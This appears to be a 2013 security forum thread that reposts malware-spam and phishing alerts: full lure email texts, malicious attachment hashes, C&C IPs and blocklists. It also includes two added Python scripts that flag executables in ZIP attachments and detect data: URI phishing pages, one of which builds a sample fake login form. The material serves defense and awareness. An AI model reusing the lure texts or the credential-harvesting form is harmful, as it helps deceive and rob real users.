- http://blog.dynamoo.com/2013/11/this-fake-paypal-or-is-it-quickbooks.html
13 Nov 2013 - "This -fake- PayPal (or is it Quickbooks?) spam has a malicious attachment:
Date: Wed, 13 Nov 2013 02:27:39 -0800 [05:27:39 EST]
From: Payroll Reports [payroll@ quickbooks .com]
Subject: Identity Issue #PP-679-223-724-838
We are writing you this email in regards to your PayPal account. In accordance with our
"Terms and Conditions", article 3.2., we would like to kindly ask you to confirm your
identity by completing the attached form. Please print this form and fill in the
requested information. Once you have filled out all the information on the form please
send it to verification@ paypal .com along with a personal identification document
(identity card, driving license or international passport) and a proof of address
submitted with our system ( bank account statement or utility bill )
Your case ID for this reason is PP-TEBY66KNZPMU
For your protection, we might limit your account access. We apologize for any
inconvenience this may cause.
Thanks,
PayPal ...

Attached is a file Identity_Form_04182013.zip which in turn contains Identity_Form_04182013.exe which has an icon to make it look like a PDF file.
> https://lh3.ggpht.com/-sx8_WjDsH10/UoNeT2WY8MI/AAAAAAAACP8/9ov_y4ZOpJI/s1600/identity-form.png
The detection rate for this at VirusTotal is 9/47*, automated analysis tools... shows an attempted connection to signsaheadgalway .com on 78.137.113.21 (UKfastnet Ltd, UK) which is the same server used in this attack**, so you can safely assume that the whole server is compromised and I recommend that you block that particular IP."
* https://www.virustotal.com/en-gb/file/6e4731ec02a08573524e2acd46493dc250315f486b3200abf7b51a0a55e31188/analysis/1384340556/

** http://blog.dynamoo.com/2013/11/you-have-received-new-messages-from.html
___

CareerBuilder Notification Spam
- http://threattrack.tumblr.com/post/66872856439/careerbuilder-notification-spam
Nov 13, 2013 - "Subjects Seen:
CareerBuilder Notification
Typical e-mail details:
Hello,
I am a customer service employee at CareerBuilder. I found a vacant position that you may be interested in based on information from your resume or a recent online submission you made on our site.
You can review the position on the CareerBuilder by downloading the attached PDF file.
Attached file is scanned in PDF format.
Adobe(R)Reader(R) can be downloaded from the following URL: adobe.com
Best wishes in your job search !
Savannah_Moyer
Careerbuilder Customer Service Team

Malicious File Name and MD5:
CB_Offer_<random>.zip (B61D44F18092458F7B545A16D2FF77D6)
CB_Offer_<random>.exe (40AB8B0050E496FB00F499212B600DDB)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f04c30490974e668e917a2b953c45753/tumblr_inline_mw7h9fdQrQ1r6pupn.png

Tagged:
CareerBuilder: http://threattrack.tumblr.com/tagged/CareerBuilder
Upatre: http://threattrack.tumblr.com/tagged/Upatre
___

Facebook Password Request Spam
- http://threattrack.tumblr.com/post/66873997398/facebook-password-request-spam
Nov 13, 2013 - "Subjects Seen:
You requested a new Facebook password!
Typical e-mail details:
Hello,
You have received a secure message. You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
Read your secure message by opening the attachment, Facebook-SecureMessage.zip.

Malicious File Name and MD5:
Facebook-SecureMessage.zip (FE3AB674A321959B3EA83CF54666A763)
Transaction_{_tracking}.exe (95191C75EF4A87CBFA46C0818009312E)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/0d5ef87b8b15f44b0c999e8ca90912df/tumblr_inline_mw7iewKvP31r6pupn.png

Tagged:
Facebook: http://threattrack.tumblr.com/tagged/Facebook
Upatre: http://threattrack.tumblr.com/tagged/Upatre
___

EXE-in-ZIP SPAM storm continues
- http://blog.dynamoo.com/2013/11/the-exe-in-zip-spam-storm-continues.html
13 Nov 2013 - "Two more EXE-in-ZIP spams.. the first is a terse one with a subject "Voice Message from Unknown Caller" or "Voicemail Message from unknown number", not much else, with a malicious EXE-in-ZIP (VoiceMessage.zip) attachment with VirusTotal score of 7/46* which calls home... to amandas-designs .com on 80.179.141.8 (012 Smile Communications Ltd., Israel)

The second one is a -fake- Wells Fargo spam similar to this:
We have received this documents from your bank, please review attached documents.
Lela Orozco
Wells Fargo Advisors
817-232-5887 office
817-067-3871 cell Lela.Orozco@ wellsfargo .com
Investments in securities and insurance products are:
NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE
Wells Fargo Advisors, LLC is a nonbank affiliate of Wells Fargo & Company, Member
FINRA/SIPC. 1 North Jefferson, St. Louis, MO 63103 ...

In this case the EXE-in-ZIP attachment (BankDocs.zip) has a VirusTotal detection rate of 14/47** and calls home... to kidgrandy .com on 184.154.15.190 (Singlehop, US). Given the massive onslaught of EXE-in-ZIP spam, I would strongly recommend blocking ZIP files with executables in them at the perimeter."
* https://www.virustotal.com/en-gb/file/4f8a8db1d66a8172ae46abd2ff2c9f576a48dccd3d7d4334c439caf98f8c0979/analysis/1384377409/

** https://www.virustotal.com/en-gb/file/5bda57e0cca9728ad56314c90a54c61c51edf3d3b7c548056041f81660d0d667/analysis/1384377605/

- https://www.virustotal.com/en/ip-address/80.179.141.8/information/

- https://www.virustotal.com/en/ip-address/184.154.15.190/information/

:mad: :fear:
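Two of the posts above describe the same perimeter problem from both ends: the "Outlook Settings" spam ships a password-protected ZIP with the password in the message body, and the EXE-in-ZIP post recommends blocking ZIP files with executables in them at the perimeter. The following is an added example of such a check, written for this page and not code from dynamoo or ThreatTrack. It pulls a password the body offers for its own attachment, opens the archive, and flags members that are executables by extension, by double extension (the "FMS-Case-<random>.zip.exe" pattern) or by PE header whatever the name claims. The archive at the bottom is constructed for the demo; the member names are modelled on the lures above and contain only a fake "MZ" stub, not real malware.

```python
"""Perimeter triage for EXE-in-ZIP mail attachments.

Added example, not code from the quoted blogs. It flags archive members that
are Windows executables by extension, by double extension (the
"FMS-Case-<n>.zip.exe" pattern) or by PE header whatever the name says, and
it pulls a password the spam body offers for its own attachment (the
"PaSdIaoQ" trick) so encrypted members can still be opened. Sample data at
the bottom is constructed for the demo. Standard library only."""
import io
import re
import zipfile

# Extensions Windows will execute directly; a lure named *.pdf.exe still ends in one.
EXEC_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".jse",
             ".vbs", ".vbe", ".wsf", ".msi", ".dll", ".cpl"}

# "please use the following password: PaSdIaoQ" / "using your security PIN 55178"
PASSWORD_RE = re.compile(
    r"\b(?:password|passcode|pin)\b\s*[:=]?\s*([A-Za-z0-9!@#$%^&*_-]{4,})", re.I)


def extract_zip_password(body):
    """Return a password/PIN the message body hands out for its attachment, or None."""
    m = PASSWORD_RE.search(body)
    return m.group(1) if m else None


def classify_member(name, head):
    """Reasons one archive member looks like a disguised executable."""
    reasons = []
    base = name.lower().rsplit("/", 1)[-1]
    exts = ["." + p for p in base.split(".")[1:]]
    if exts and exts[-1] in EXEC_EXTS:
        reasons.append("executable extension " + exts[-1])
        if len(exts) >= 2:
            reasons.append("double extension " + "".join(exts[-2:]))
    if head[:2] == b"MZ":
        reasons.append("PE header (MZ) regardless of name")
    return reasons


def inspect_zip_attachment(zip_bytes, password=None):
    """Map each member to its findings; an empty list means nothing suspicious.

    Members that stay encrypted (no or wrong password) are still judged by
    name and marked as not content-inspected. Raises zipfile.BadZipFile for
    data that is not a ZIP at all, which a perimeter policy should treat as
    suspicious in its own right."""
    findings = {}
    pwd = password.encode() if password else None
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            reasons = findings.setdefault(info.filename, [])
            head = b""
            try:
                with zf.open(info, pwd=pwd) as fh:  # pwd is ignored for clear members
                    head = fh.read(64)
            except RuntimeError:  # zipfile's error for a missing or bad password
                reasons.append("encrypted member, content not inspected")
            reasons.extend(classify_member(info.filename, head))
    return findings


def should_block(findings):
    """Block the message when any member drew at least one finding."""
    return any(findings.values())


def build_sample_zip():
    """Constructed stand-in for the spam attachments above (not a real sample)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("FMS-Case-123.zip.exe", b"MZ" + b"\x90" * 62)  # fake PE stub
        zf.writestr("tax 2012-2013.scr", b"MZ" + b"\x00" * 62)     # fake PE stub
        zf.writestr("readme.txt", b"nothing executable here")
    return buf.getvalue()


if __name__ == "__main__":
    body = ("Key archival has been implemented, in order to decrypt the file "
            "please use the following password: PaSdIaoQ")
    print("password offered in body:", extract_zip_password(body))
    report = inspect_zip_attachment(build_sample_zip(), extract_zip_password(body))
    for member, reasons in report.items():
        print(member, "->", reasons or "ok")
    print("block at perimeter:", should_block(report))
```

The header check matters more than the extension list: the lures above rename executables to look like PDFs and Outlook files, but the first two bytes of a Windows executable are still "MZ". Python's zipfile can read ZipCrypto-encrypted members when given the password, so the body-supplied password is enough to look inside the "Outlook.zip" style attachment; an archive that cannot be opened at all should be treated as a finding, not waved through.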

AplusWebMaster
2013-11-14, 14:13
FYI...

Google Drive phish...
- http://www.threattracksecurity.com/it-blog/google-drive-phish-deploys-data-uri-technique/
Nov 14, 2013 - "... interesting mail which arrived in my inbox earlier today. It came from a Gmail address tied to a Google+ account which appears to be Chinese in origin, and had me BCC’d in.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/cheedrive1.jpg
The email is called “Document”... This might look convincing to the unwary, but a simple hover over the link reveals that this isn’t going to take you to Google Drive:
bashoomal(dot)com/redirect.html
The end-user will be presented with a -fake- Google Drive login page which asks them to fill in their email address / password.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/cheedrive2.jpg
As you can see from the URL bar, this is another -phish- that tries to take advantage of the Data URI scheme... The Google account sending the mails appears to have been around since 2007, and also has a Youtube account – it seems likely that it has been compromised, and is being used to further the spread of malicious links..."

- https://isc.sans.edu/diary.html?storyid=17018
2013-11-13
___

Malware sites to block - (Caphaw)
- http://blog.dynamoo.com/2013/11/malware-sites-to-block-14112013-caphaw.html
14 Nov 2013 - "These domains and IPs appear to be involved in a Caphaw malware attack, such as this one*. All the IPs involved belong to Hetzner in Germany, and although some also host legitimate sites I would strongly recommend blocking them.
Recommended blocklist:
141.8.225.5
46.4.47.20
46.4.47.22
88.198.57.178 ..."
(More listed at the dynamoo URL above.)
* http://urlquery.net/report.php?id=7696954

- http://www.virusradar.com/en/Win32_Caphaw.K/description

:mad::fear:
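The Google Drive phish above is caught by hovering over the link (the text promises Drive, the href goes to bashoomal(dot)com/redirect.html) and by looking at the address bar on the landing page (a data: URI rather than a Google host). The following is an added example that does the same two checks by machine; it is written for this page and is not ThreatTrack's code. It extracts every anchor from the message HTML, flags data:/javascript: targets and text-versus-href host mismatches, and decodes a data:text/html landing page to see whether it carries a password form. The mail fragment and landing page are constructed for the demo; only the redirector host name is taken from the post, and the form action URL under it is invented.

```python
"""Link audit for mail that hides a data: URI phish behind a "Google Drive" lure.

Added example, not code from the quoted post. It does by machine what the
post does by hovering: every anchor in the message HTML is checked for a
data:/javascript: target and for link text naming one host while the href
points at another; a landing URL that is itself a data:text/html page is
decoded and searched for a credential form. The mail and landing page below
are constructed for the demo; bashoomal(dot)com is the only name taken from
the post and the post.php path under it is invented. Standard library only."""
import base64
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlsplit


class _LinkCollector(HTMLParser):
    """Collect (href, visible text) for each <a> in a fragment of mail HTML."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href") or ""
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def extract_links(html):
    p = _LinkCollector()
    p.feed(html)
    return p.links


HOST_IN_TEXT = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.I)


def _same_site(a, b):
    """Crude registrable-domain check: compare the last two labels."""
    return a.lower().split(".")[-2:] == b.lower().split(".")[-2:]


def audit_link(href, text):
    """Reasons one mail link is suspicious; empty list means it passed."""
    reasons = []
    parts = urlsplit(href.strip())
    if parts.scheme.lower() in ("data", "javascript"):
        reasons.append(parts.scheme.lower() + ": URI as link target")
    target = parts.hostname or ""
    named = HOST_IN_TEXT.search(text)
    if named and target and not _same_site(named.group(1), target):
        reasons.append("link text names %s but target is %s" % (named.group(1), target))
    return reasons


DATA_HTML = re.compile(r"^data:text/html(?:;charset=[^;,]+)?(;base64)?,(.*)$", re.I | re.S)


def decode_data_uri(uri):
    """Return the HTML carried inline by a data:text/html URI, else None."""
    m = DATA_HTML.match(uri.strip())
    if not m:
        return None
    payload = m.group(2)
    if m.group(1):
        return base64.b64decode(payload).decode("utf-8", "replace")
    return unquote(payload)


def find_password_form(html):
    """Action URL of a form containing a password field, or None if there is none."""
    if not re.search(r"<input[^>]*type\s*=\s*['\"]?password", html, re.I):
        return None
    m = re.search(r"<form[^>]*action\s*=\s*['\"]?([^'\"\s>]+)", html, re.I)
    return m.group(1) if m else ""


# Constructed sample mail: the text shows a Drive URL, the href goes to the redirector.
SAMPLE_MAIL = ('<p>Document</p>'
               '<a href="http://bashoomal.com/redirect.html">'
               'https://drive.google.com/file/d/abc/view</a>')

# Constructed landing page: a fake login served entirely from a data: URI.
SAMPLE_LANDING = "data:text/html;base64," + base64.b64encode(
    b'<form action="http://bashoomal.com/post.php">'
    b'<input name="email"><input type="password" name="pw"></form>').decode()

if __name__ == "__main__":
    for href, text in extract_links(SAMPLE_MAIL):
        print(href, "->", audit_link(href, text) or "ok")
    page = decode_data_uri(SAMPLE_LANDING)
    print("landing page posts credentials to:", find_password_form(page))
```

A data: URI page has no origin a URL filter can block and never touches the wire until the form is submitted, so the useful signals are the ones above: the link target in the message, and the form action inside the decoded page. The two-label domain comparison is deliberately crude; a production check should use the public suffix list so that, for example, a lure naming drive.google.co.uk is compared correctly.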

AplusWebMaster
2013-11-15, 17:58
FYI...

More Malware sites to block - (Caphaw)
- http://blog.dynamoo.com/2013/11/malware-sites-to-block-15112013-caphaw.html
15 Nov 2013 - "Thanks to a tip to investigate 199.68.199.178 I discovered that the Caphaw network I looked at yesterday* is much bigger than I thought. The following IPs and domains can all be regarded as malicious (.SU domains are normally a dead giveaway for evil activity). The recommended blocklist is at the end of the post (highlighted). These are the hosts involved either now or recently with hosting these Caphaw domains..."
(Long list at the dynamoo URL above.)
* http://blog.dynamoo.com/2013/11/malware-sites-to-block-14112013-caphaw.html

- https://www.virustotal.com/en/ip-address/199.68.199.178/information/

- http://www.virusradar.com/en/Win32_Caphaw/detail
___

Fake BoA fax message SPAM / 442074293440-1116-084755-242.zip
- http://blog.dynamoo.com/2013/11/ringcentral-bank-of-america-fax-message.html
15 Nov 2013 - "This -fake- fax message email has a malicious attachment:
Date: Fri, 15 Nov 2013 12:05:36 -0500 [12:05:36 EST]
From: RingCentral [notify-us@ ringcentral .com]
Subject: New Fax Message on 11/15/2013 at 09:51:51 CST
You Have a New Fax Message
From
Bank of America
Received: 11/15/2013 at 09:51:51 CST
Pages: 5
To view this message, please open the attachment.
Thank you for using Ring Central .

Screenshot: https://lh3.ggpht.com/-bw4CETLVd5I/UoZep7qACkI/AAAAAAAACQg/hq_7rR1l0nc/s1600/ringcentral.png

There is an attachment 442074293440-1116-084755-242.zip which unzips into a malicious executable 442074293440-1116-084755-242.exe which has a VirusTotal detection rate of 11/47*. Automated analysis tools... show an attempted connection to aspenhonda .com on 199.167.40.33 (FAM Info Systems / ServInt, US). The domain in question has been -hacked-, it is not possible to tell if the entire server is compromised but there are other legitimate sites on that box."
* https://www.virustotal.com/en-gb/file/fa877e587e5ae611d3a1f6c27cc2629efcaebad39084bc3a6fb1496b076c643d/analysis/1384537461/

- https://www.virustotal.com/en/ip-address/199.167.40.33/information/
___

Citigroup Secure Message Spam
- http://threattrack.tumblr.com/post/67060979477/citigroup-secure-message-spam
Nov 15, 2013 - "Subjects Seen:
You have a new encrypted message from Citigroup Inc.
Typical e-mail details:
You have received a secure e-mail message from Citigroup Inc..
We care about your privacy, Citigroup Inc. uses this secure way to exchange e-mails containing personal information.
Read your secure message by opening the attachment. You will be prompted to save (download) it to your computer.
If you have concerns about the validity of this message, please contact the sender directly.
First time users - will need to register after opening the attachment.

Malicious File Name and MD5:
SecureMessage.zip (969AEFFE28BC771C8453BF849450BC6A)
SecureMessage.exe (C2CD447FD9B19B7F062A5A8CF6299600)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/b1298b867cb6486caf9d64497db4a0e7/tumblr_inline_mwb9gyugMb1r6pupn.png

Tagged: CitiGroup, Upatre
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Authorization Form Email Messages - 2013 Nov 15
Fake Product Purchase Order Email Messages - 2013 Nov 15
Fake Payment Receipt Email Messages - 2013 Nov 15
Malicious Personal Pictures Attachment Email Messages - 2013 Nov 15
Fake Bank Payment Notification Email Messages - 2013 Nov 15
Fake Product Order Email Messages - 2013 Nov 15
Fake Meeting Invitation Email Messages - 2013 Nov 15
Fake Payroll Invoice Notification Email Messages - 2013 Nov 15
Fake Product Quote Request Email Messages - 2013 Nov 15
Fake Shipping Order Information Email Messages - 2013 Nov 15
Fake Shipping Notification Email Messages - 2013 Nov 15
Fake Product Inquiry Email Messages - 2013 Nov 15
Fake Payment Receipt Email Messages - 2013 Nov 15
Fake Tax Document Email Messages - 2013 Nov 15
Fake Travel Information Email Messages - 2013 Nov 15
Email Messages with Malicious Attachments - 2013 Nov 15
(More detail and links at the cisco URL above.)

:mad: :fear:

AplusWebMaster
2013-11-18, 15:41
FYI...

Phone SCAM - (08445715179)
- http://blog.dynamoo.com/2013/11/0844-number-scam-08445715179.html
18 Nov 2013 - "This is a particularly insidious scam that relies on mobile phone users in the UK not knowing that an 0844 number is much, much more expensive than a normal phone call. The scam SMS goes something like this:
ATTENTION! We have tried to contact you, It is important we speak to you today. Please call 08445715179 quoting your reference 121190. Thank You.

In this case the sender's number was +447453215347 (owned by Virgin Media Wholesale Ltd, but operated by a third party). The catch is that the calls to an 0844 number can cost up to 40p per minute (see more details here*), a large chunk of which goes into the operator's pockets. So what happens when you ring back? You get put on hold.. and left on hold until you have racked up a significant bill. Sadly, I don't know who is behind this scam, and in this case it was -illegally- sent to a TPS-registered number**. If you get one of these, you should forward the spam and the sender's number to your carrier. In the case of T-Mobile, O2 and Orange the number to report to is 7726 ("SPAM"). Vodafone customers should use 87726 ("VSPAM") and Three customers should use 37726 ("3SPAM"). Hopefully the carriers will act if there are enough complaints. You should also send a complaint to the ICO*** who may be able to take more serious action against these spammers."
* http://www.moneysavingexpert.com/news/phones/2013/08/how-much-do-08-numbers-really-cost-dont-get-fleeced-by-premium-rate-calls

** http://www.tpsonline.org.uk/tps/number_type.html

*** http://www.ico.org.uk/complaints/marketing/2
___

Freenters Hit By Breach, Student Data Leaked
- http://www.threattracksecurity.com/it-blog/freenters-hit-breach-student-data/
Nov 18, 2013 - "If you’re a student who signed up to the Freenters free printing service, you may want to go and ensure your logins are safe and sound, as it appears they were compromised pretty badly.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/printpwn11.jpg
... Affected students were sent two separate emails which added to the confusion, with one stating “Passwords were secure” with a follow up advising them “we highly recommend you change your password for other accounts”... This might be a perfect time to ensure you’re not sharing passwords across sites and services, and think about using a password manager..."
___

PlayStation 4 and Xbox One Survey Scams ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/playstation-4-and-xbox-one-survey-scams-spotted/
Nov 18, 2013 - "... We found a Facebook page that advertised a PS4 raffle. Users were supposed to visit the advertised site, as seen below:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/11/ps4-1.jpg
The site urges users to “like” or “follow” the page, and then share it on social media sites. This could be a way for scammers to gain a wider audience or appear more reputable.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/11/ps4-2.jpg
Afterwards, users are required to enter their name and email address. Instead of a raffle, they are led to a survey scam:
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/11/ps4-3.jpg
... Scams are also using the Xbox One as bait. However, the site in this case is currently inaccessible. Since the Xbox One has yet to be released, scammers could be waiting for the official launch before making the site live.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/11/xbox1.jpg
The scams were not limited to Facebook. We spotted a site that advertised a Xbox One giveaway. Like the PS4 scam, users are encouraged to promote the giveaway through social media. Once they click the “proceed” button, they are led to a site that contains a text file they need for the raffle. But like other scams, this simply leads to a survey site.
> http://blog.trendmicro.com/trendlabs-security-intelligence/files/2013/11/xbox2.jpg
... Product launches have become a tried-and-tested social engineering bait. Earlier in the year, we saw scams that used Google Glass as a way to trick users. Early last year, the launch of the iPad 3 became the subject of many scams and spam. Users should always be cautious when it comes to online raffles and giveaways, especially from unknown or unfamiliar websites. If the deal seems too good to be true, it probably is..."
___

Netflix on your PC - Beware of Silverlight exploit
- http://blog.malwarebytes.org/exploits-2/2013/11/streaming-netflix-on-your-pc-beware-of-silverlight-exploit/
Nov 15, 2013 - "A vulnerability affecting Microsoft Silverlight 5 is being used in the wild to infect PCs that visit compromised or malicious websites... The flaw, which exists in versions prior to 5.1.20125.0, allows attackers to execute arbitrary code on the affected systems without any user interaction. Microsoft patched the flaw (CVE-2013-0074*) on March 12, 2013. The Silverlight exploit was first spotted in the Angler exploit kit by @EKWatcher and later documented by Kafeine. The screenshot below summarizes the attack:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2013/11/screenshot_2013-11-13_016.png
... those that already have an older version of Silverlight can still watch Netflix and may not be aware that their computers are at risk. Please ensure that you are running the latest version available (5.1.20913.0) and that it is set to install updates automatically:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2013/11/silverlight.png "

* http://technet.microsoft.com/en-us/security/bulletin/ms13-022
___

IRS Tax Payment Rejection Spam
- http://threattrack.tumblr.com/post/67401200848/irs-tax-payment-rejection-spam
Nov 18, 2013 - "Subjects Seen:
Your FED TAX payment ( ID : 6LHIRS930292818 ) was Rejected
Typical e-mail details:
*** PLEASE DO NOT RESPOND TO THIS EMAIL ***
Your federal Tax payment (ID: 6LHIRS930292818), recently sent from your checking account was returned by the your financial institution.
For more information, please download notification, using your security PIN 55178.
Transaction Number: 6LHIRS930292818
Payment Amount: $ 2373.00
Transaction status: Rejected
ACH Trace Number: 268976180630733
Transaction Type: ACH Debit Payment-DDA

Malicious File Name and MD5:
FED TAX payment.zip (661649A0CA9F13B06056B53B9BC3CBA7)
FED TAX payment.exe (157BBC283245BBE5AB2947C446857FC9)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/7f7ede2a153c661ffd968854d85937b7/tumblr_inline_mwhbufHbhC1r6pupn.png

Tagged: IRS, Upatre

:mad: :fear:

AplusWebMaster
2013-11-19, 13:24
FYI...

Fake ‘Sent from my iPhone’ themed emails - expose users to malware
- http://www.webroot.com/blog/2013/11/19/cybercriminals-spamvertise-tens-thousands-fake-sent-iphone-themed-emails-expose-users-malware/
Nov 19, 2013 - "Cybercriminals are currently mass mailing tens of thousands of malicious emails, supposedly including a photo attachment that’s been “Sent from an iPhone”. The social engineering driven spam campaign is, however, the latest attempt by a cybercriminal/group of cybercriminals that we’ve been monitoring for a while, to attempt to trick gullible users into unknowingly joining the botnet operated by the malicious actor(s) behind the campaign. Detection rate for the spamvertised attachment: MD5: 46e077f058f5a6eddee3c851f8e56838 – * ... Trojan.Win32.Neurevt.jl; Trojan:Win32/Neurevt.A... Once executed, the sample attempts to contact the following C&C servers:
91.109.14.224
31.7.35.112
49.50.8.93
173.0.131.15
209.50.251.101
88.198.7.211
64.120.153.69
219.94.206.70
173.231.139.57
alongside the by-now well-known networksecurityx.hopto .org (1), a C&C host..."
* https://www.virustotal.com/en/file/58496093758ee50877ce8453987259bf30d4222d0954525d89011909a0466217/analysis/1384441224/

Diagnostic page for hopto .org
1) http://google.com/safebrowsing/diagnostic?site=hopto.org/
"... Part of this site was listed for suspicious activity 731 time(s) over the past 90 days... Malicious software includes 817 exploit(s), 113 trojan(s), 59 virus. Successful infection resulted in an average of 5 new process(es) on the target machine. This site was hosted on 80 network(s)... Over the past 90 days, hopto .org appeared to function as an intermediary for the infection of 140 site(s)... this site has hosted malicious software over the past 90 days. It infected 210 domain(s)..."
___

Fake Snapchat downloads in Search Engine Ads
- http://www.threattracksecurity.com/it-blog/fake-snapchat-downloads-search-engine-ads/
Nov 19, 2013 - "Hot on the heels of fake Snapchat Adware installs*, we have advert results in both Google and Bing adverts leading to non-existent downloads of Snapchat in return for an Adware bundle. Here’s Google:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/snapchat-googlesearch.png
The site in question here is soft1d(dot)com
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/soft1dprompt.jpg
Here’s Bing:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/snapadsbing.jpg
The ad in question is the one in the bottom right hand corner for download-apps(dot)org/snapchat
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/download-apps-snap.jpg
Both sites lead to the same install. Comments from Matthew, one of our researchers in the Labs who discovered this: 'When you run the installer it proceeds to install Fast Media Converter (Zango/Pinball Corp/BlinkX/LeadImpact) and LyricsViewer (Crossrider) with the only notice being from the page shown in the “prompt” screenshots. After loading those, it proceeds to offer you some more: a Conduit Toolbar and Dealply. In the end there is no Snapchat install or even a replacement for Snapchat'...
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/ignition-snap-1.png
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/ignition-snap-3.png
VirusTotal has this one pegged at 4/47** ..."
* http://www.threattracksecurity.com/it-blog/fake-snapchat-install-leads-adware/
Nov 1, 2013
** https://www.virustotal.com/en/file/1616385d2eb89a60387a5d42f598987063ad932f6d3793bdee4a57b8bb504b40/analysis/
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Job Offer Notification Email Messages - 2013 Nov 19
Fake Monthly Report Notification Email Messages - 2013 Nov 19
Fake Invoice Attachment Email Messages - 2013 Nov 19
Fake Picture Sharing Email Messages - 2013 Nov 19
Fake Payment Information Notification Email Messages - 2013 Nov 19
Email Messages with Malicious Attachments - 2013 Nov 19
Fake Picture Sharing Email Messages - 2013 Nov 19
Fake Fax Message Delivery Email Messages - 2013 Nov 19
Fake Product Quote Request - 2013 Nov 19
Fake Fax Message Delivery Email Messages - 2013 Nov 19
Fake Payment Confirmation Email Messages - 2013 Nov 19
Fake Personal Photo Sharing Email Messages - 2013 Nov 19
Fake Payment Invoice Email Messages - 2013 Nov 19
Fake Shipment Tracking Information Email Messages - 2013 Nov 19
Fake Product Order Notification Email Messages - 2013 Nov 19
Fake Scanned Image Notification Email Messages - 2013 Nov 19
Fake Product Purchase Order Email Messages - 2013 Nov 19
Fake Product Purchase Order Email Messages - 2013 Nov 19
Fake Bank Payment Notification Email Messages - 2013 Nov 19
Fake Customer Complaint Attachment Email Messages - 2013 Nov 19
(More info and links at the cisco URL above.)

:mad: :mad:

AplusWebMaster
2013-11-20, 15:33
FYI...

Fake mileage reimbursement email leads to malware ...
- http://www.webroot.com/blog/2013/11/20/fake-annual-form-std-261-authorization-use-privately-owned-vehicle-state-business-themed-emails-lead-malware/
Nov 20, 2013 - "Want to file for mileage reimbursement through a STD-261 form? You may want to skip the tens of thousands of -malicious- emails currently in circulation, attempting to trick users into executing the malicious attachment. Once downloaded, your PC automatically joins the botnet operated by the cybercriminal(s) behind the campaign, undermining the confidentiality and integrity of the host.
Sample screenshot of the spamvertised email:
> https://www.webroot.com/blog/wp-content/uploads/2013/11/STD261_Fake_Rogue_Malicious_Fraudulent_Email_Spam_Spamvertised_Social_Engineering_Malware_Malicious_Software-1024x64.png
Detection rate for the spamvertised attachment: MD5: 3aaa04b0762d8336379b8adedad5846b – * ... Trojan.Win32.Bublik.bkri; TrojanDownloader:Win32/Upatre.A. Once executed, the sample starts listening on ports 8412 and 3495... It then attempts to phone back to the following C&C servers... (long list of IPs at the first webroot URL above)..."
* https://www.virustotal.com/en/file/e891094bb8a3b68edeb36d56d70312956a24504a78f2a84c61816ccda953cd9c/analysis/1384525049/
___

Red Cross 419 Scam exploits Typhoon Haiyan
- http://www.threattracksecurity.com/it-blog/red-cross-419-scam-exploits-typhoon-haiyan/
Nov 20, 2013 - "There are a number of emails currently in circulation attempting to cash in on the generosity of individuals and organisations wanting to assist the Typhoon Haiyan relief efforts. Another one just landed in our spamtraps, and reads as follows:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/fakehaiyanmail-wm.jpg
... If the poor spelling and generally dreadful formatting of the mail doesn’t give the game away, hopefully the free Yahoo email address will help to tip the balance. This is absolutely a scam, and one that should be directed to the recycle bin / spam folder with all due haste. Elsewhere, Trend Micro are seeing missives related to fake Navy donations* and Symantec are dealing with one “Andrew Stevens” who is asking for donations** via Western Union. You can be sure more of these will emerge in the coming weeks, so please be cautious and don’t reply to any email sent out of the blue. No matter how convincing the mail appears to be, there’s a very good chance your money is going to end up with someone other than who you intended it for."
* http://blog.trendmicro.com/trendlabs-security-intelligence/watching-out-for-typhoon-haiyan-scams

** http://www.symantec.com/connect/blogs/scams-emerge-typhoon-haiyan-strikes-philippines
___

Bitcoin Boom leads to Malware Badness
- http://www.threattracksecurity.com/it-blog/bitcoin-boom-leads-malware-badness/
Nov 20, 2013 - "... you may be tempted to mine some Bitcoins via the art of downloading random files from the internet... There are certainly more than enough options to choose from; Youtube videos, promo sites, Pastebin posts – you name it, they’re all out there and they’re all clamouring for your attention. Just keep in mind that you never really know what you’re signing up to when playing the random download game... Scammers are promoting “no survey Bitcoin generators”, which come with -surveys- attached regardless.
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/11/bitcoins3.jpg
If no survey is available, you’re encouraged to pay for a premium account to access the download.
